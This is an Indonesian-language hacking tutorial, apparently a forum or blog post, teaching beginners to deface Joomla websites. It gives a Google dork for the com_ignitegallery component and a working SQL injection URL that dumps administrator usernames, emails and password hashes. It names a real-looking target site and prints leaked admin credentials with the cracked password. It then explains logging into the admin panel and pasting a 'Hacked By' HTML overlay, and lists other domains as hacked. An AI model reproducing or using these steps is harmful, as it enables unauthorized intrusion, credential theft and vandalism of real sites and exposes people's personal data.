Cara Mudah Deface Web

Deface for newbie ( kaya udah master aja ente gan ) awakakaka ... Nyolotin ya judul nya ,

Dsini w mau kasih tau cara mudah untuk mendeface web yang khususnya hanya berbasis joomla dengan menggunakan exploit yang sederhana... 99% berhasil gan :D .. W juga di kasih tau sama mbak Dian Yogyafree sih ..xixixixi ( jgn lupa main main ke tmpat w X-code ..hehehe )
Ok langsung aja...

[ DORK ]
Buka mbah Google di komputer ente => lalu ketikkan ini di colom search
inurl:"option=com_ignitegallery"

[ TARGET ]
example target web yang udah ente dapat
http://bkengland16.com/index.php?option=com_ignitegallery&task=view&gallery=17

Cut ( Cut iku boso londo rekk , arti e potong ) link tersebut hingga seperti ini

http://bkengland16.com/index.php?option=

[ EXPLOIT ]
And next .. Masukan exploit ini di link yang sudah ente potong tadi ,
com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

Hingga seperti ini ..

http://bkengland16.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

Lalu apa yang terjadi JRENNNNNGGGG...
Di halaman tersebut tersedia sperti ini

62:Administrator:cgardner:admin@st- wilfridspartners.co.uk:1d0beb9cc9a4eb8dbcef313113529c09:ruUH5BgH6vQ3wDZsfSquzaJGW6lFtTrD:Super Administrator

Ok skarang w artikan scara terpisah ...

62 = ID
Administrator = Name
cgardner = Username ( Digunakan Buat Login Admin )
admin@st-wilfridspartners.co.uk = Email
1d0beb9cc9a4eb8dbcef313113529c09:ruUH5BgH6vQ3wDZsfSquzaJGW6lFtTrD = Password ( hash )
Super Administrator = Group( kekuatan kuasa web )


[ DEFACE ]
Username dan Password sudah didapat , tapi password itu msh dalam bntuk hash bro , kudu di crack .. Hasil dari crack password di atas adalah charbeth..
So yang kita butuhin sekarang udah ada..

Username : cgardner
Password : charbeth

Sekarang ente tinggal cari pintu masuk nya gan (page admin).. Karena ini berbasis joomla , ga usah repot" cariin page admin nya , cukup tambahkan administrator di belakang link target ..

Example

http://bkengland16.com/administrator

Karena pada umumnya web berbasis joomla menggunakan page admin administrator , kalo ga ada page admin nya , berarti udah di sembunyiin sama admin nya gan ( dan page admin web dalam tutor ini sudah saya simpan dalam" gan :D )

Silahkan anda login .. Dan kuasa admin sudah berada di tangan anda sekarang ..
Setelah itu ente pergi ke menu template, kalau ga tau ngedit template , ente buka aja menu "add new post" dan edit sesuka hati ente , kalau mau menutup seluruh halaman , copas Html di bawah ini..(coz w tau , ente pasti ga ngerti html itu apa ..awakakaka )

<DIV align=center><DIV id=Layer1 style="BORDER-RIGHT:#000000 1px; BORDER- TOP:#000000 1px; Z-INDEX: 1; LEFT:0px; BORDER-LEFT: black 1px; WIDTH: 2000px; BORDER-BOTTOM: black 1px; POSITION: absolute; TOP: 0px; HEIGHT: 2000px; BACKGROUND-COLOR: black; layer-background-color: black"><center><br /><b><font face="papyrus" color="red" size="5">..::| Hacked By isi pake nick ente |::..</font></ h2><br /><br /><img src="isi pake url pic ente" ><br /><br /><font face="papyrus" color="red" size="5">isi pake kata" ente</font></div></a>

So..Selamat anda sudah menjadi seorang defacer ..
Ingat !!! Selagi web itu ada lobang ,apakah web lokal atau pun interlokal..hanya satu kata HAAJJAAAARRR...seperti yang dibawah ini..

http://www.greenland.co.uk
http://www.artikata.com
http://www.mxtn.gr
http://www.bullpets.com
http://www.youthexcelent.com

xixixixi... hepy dipess gan..

Tutorial By My Sister : Dian Yogyafree
Tengkiu kakak... Luph u pool .emmuaacchh ( kakak w satu ini emang cantik banget , w aja kesmsem , cantik" gini dia programmer , nah kalo w , ganteng" tapi hackmer awakakak)


for kak dian = kalau aku pulang indonesia , kita kawin ya kak..awakakakakak peace kak..